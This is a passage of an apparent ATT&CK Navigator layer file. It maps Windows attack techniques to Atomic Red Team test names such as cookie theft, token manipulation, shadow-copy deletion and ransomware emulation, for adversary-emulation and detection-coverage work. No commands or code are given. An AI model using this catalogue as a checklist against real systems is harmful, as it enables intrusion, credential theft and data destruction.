RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - 